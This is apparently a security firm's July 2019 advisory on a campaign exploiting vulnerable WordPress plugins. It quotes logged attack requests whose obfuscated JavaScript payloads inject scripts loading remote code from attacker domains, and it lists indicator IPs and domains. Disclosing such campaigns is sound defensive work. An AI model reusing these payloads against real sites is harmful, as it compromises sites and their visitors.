Plugins Under Attack: July 2019

Labs Note

A long-lasting malware campaign targeting deprecated, vulnerable versions of plugins continues to be leveraged by attackers to inject malicious scripts into affected websites:

This month they added seven new plugins and continued attacking old ones.

Plugins targeted: July 2019

Plugins that are continuing to be leveraged by attackers for months are:

 

Payloads added to the campaign

 

WordPress Plugin Appointment Booking Calendar

185.225.16.152 - CP_ABC_post_edition=1&cfwpp_edit=js&editionarea=var+nt+%3D+String.fromCharCode%2857%2C+57%2C57%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+String.fromCharCode%28115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+jb+%3D+String.fromCharCode%28104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%29%3B+var+tb+%3D+String.fromCharCode%28116%2C+101%2C+120%2C+116%2C+47%2C+106%2C+97%2C+118%2C+97%2C+115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+lb+%3D+String.fromCharCode%28100%2C+101%2C+115%2C+116%2C+114%2C+111%2C+121%2C+102%2C+111%2C+114%2C+109%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+115%2C+116%2C+97%2C+121%2C+46%2C+106%2C+115%2C+63%2C+116%2C+61%2C+112%2C+38%2C+97%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B&save=Submit [22/Jul/2019] "POST /wp-admin/admin-post.php HTTP/1.1" 

myStickymenumyStickymenu

185.225.16.152 - type=attachment&width=%3C%2Fstyle%3E%3Cscript++async%3Dtrue+type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+nt+%3D+String.fromCharCode%2857%2C+57%2C57%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+String.fromCharCode%28115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+jb+%3D+String.fromCharCode%28104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%29%3B+var+tb+%3D+String.fromCharCode%28116%2C+101%2C+120%2C+116%2C+47%2C+106%2C+97%2C+118%2C+97%2C+115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+lb+%3D+String.fromCharCode%28100%2C+101%2C+115%2C+116%2C+114%2C+111%2C+121%2C+102%2C+111%2C+114%2C+109%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+115%2C+116%2C+97%2C+121%2C+46%2C+106%2C+115%2C+63%2C+116%2C+61%2C+112%2C+38%2C+97%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B%3C%2Fscript%3E%3Cstyle%3E [11/Jul/2019] "POST /wp-admin/admin-ajax.php?action=wcp_change_post_width HTTP/1.1"

File Manager

192.169.157.142 - - [23/Jul/2019] "GET /wp-admin/admin-ajax.php?action=mk_file_folder_manager&_wpnonce=1589e1018d&cmd=open&target=&init=1&tree=1&_=1535229962392 HTTP/1.1"

Appointment Booking Calendar

192.169.157.142 - CP_ABC_post_edition=1&cfwpp_edit=js&editionarea=var+nt+%3D+String.fromCharCode%2857%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+String.fromCharCode%28115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+jb+%3D+String.fromCharCode%28104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%29%3B+var+tb+%3D+String.fromCharCode%28116%2C+101%2C+120%2C+116%2C+47%2C+106%2C+97%2C+118%2C+97%2C+115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+lb+%3D+String.fromCharCode%28103%2C+114%2C+101%2C+97%2C+116%2C+102%2C+97%2C+99%2C+101%2C+98%2C+111%2C+111%2C+107%2C+112%2C+97%2C+103%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+100%2C+108%2C+116%2C+111%2C+46%2C+106%2C+115%2C+63%2C+116%2C+61%2C+112%2C+38%2C+97%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B&save=Submit [26/Jul/2019:] "POST /wp-admin/admin-post.php HTTP/1.1"

FoldersFolders

192.169.157.142 - type=attachment&width=%3C%2Fstyle%3E%3Cscript++async%3Dtrue+type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+nt+%3D+String.fromCharCode%2857%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+String.fromCharCode%28115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+jb+%3D+String.fromCharCode%28104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%29%3B+var+tb+%3D+String.fromCharCode%28116%2C+101%2C+120%2C+116%2C+47%2C+106%2C+97%2C+118%2C+97%2C+115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+lb+%3D+String.fromCharCode%28103%2C+114%2C+101%2C+97%2C+116%2C+102%2C+97%2C+99%2C+101%2C+98%2C+111%2C+111%2C+107%2C+112%2C+97%2C+103%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+100%2C+108%2C+116%2C+111%2C+46%2C+106%2C+115%2C+63%2C+116%2C+61%2C+112%2C+38%2C+97%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B%3C%2Fscript%3E%3Cstyle%3E [26/Jul/2019] "POST /wp-admin/admin-ajax.php?action=wcp_change_post_width HTTP/1.1"

Simple Staff List

192.169.157.142 - _staff_listing_default_css=%3C%2Fstyle%3E%3Cscript++async%3Dtrue+type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+nt+%3D+String.fromCharCode%2857%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+String.fromCharCode%28115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+jb+%3D+String.fromCharCode%28104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%29%3B+var+tb+%3D+String.fromCharCode%28116%2C+101%2C+120%2C+116%2C+47%2C+106%2C+97%2C+118%2C+97%2C+115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+lb+%3D+String.fromCharCode%28103%2C+114%2C+101%2C+97%2C+116%2C+102%2C+97%2C+99%2C+101%2C+98%2C+111%2C+111%2C+107%2C+112%2C+97%2C+103%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+100%2C+108%2C+116%2C+111%2C+46%2C+106%2C+115%2C+63%2C+116%2C+61%2C+112%2C+38%2C+97%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B%3C%2Fscript%3E%3Cstyle%3E [26/Jul/2019] "POST /wp-admin/admin-post.php?action=save&updated=true HTTP/1.1"

Mobile App

192.169.157.142 - canvas_editor_css=%3C%2Fstyle%3E%3Cscript++async%3Dtrue+type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+nt+%3D+String.fromCharCode%2857%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+String...skipped...99%2C+101%2C+98%2C+111%2C+111%2C+107%2C+112%2C+97%2C+103%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+100%2C+108%2C+116%2C+111%2C+46%2C+106%2C+115%2C+63%2C+116%2C+61%2C+112%2C+38%2C+97%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B%3C%2Fscript%3E%3Cstyle%3E&ssn_submit=1 [26/Jul/2019] "POST /wp-admin/admin-post.php HTTP/1.1"

 

Malicious Domains and IPs:

IPs:

192.169.157.142
185.225.16.152
178.128.57.173
185.238.0.146
185.238.0.135
45.12.32.55 
185.238.0.133
185.238.0.132
45.12.32.56
185.238.0.146
45.67.229.126
192.232.194.4

Domains Injected:

  • greatfacebookpage[.]com
  • greatinstagrampage[.]com
  • destroyforme[.]com

As always, we strongly encourage you to keep your software up to date to prevent infection. You can add a WAF as a second layer of protection to virtually patch these vulnerabilities.

You May Also Like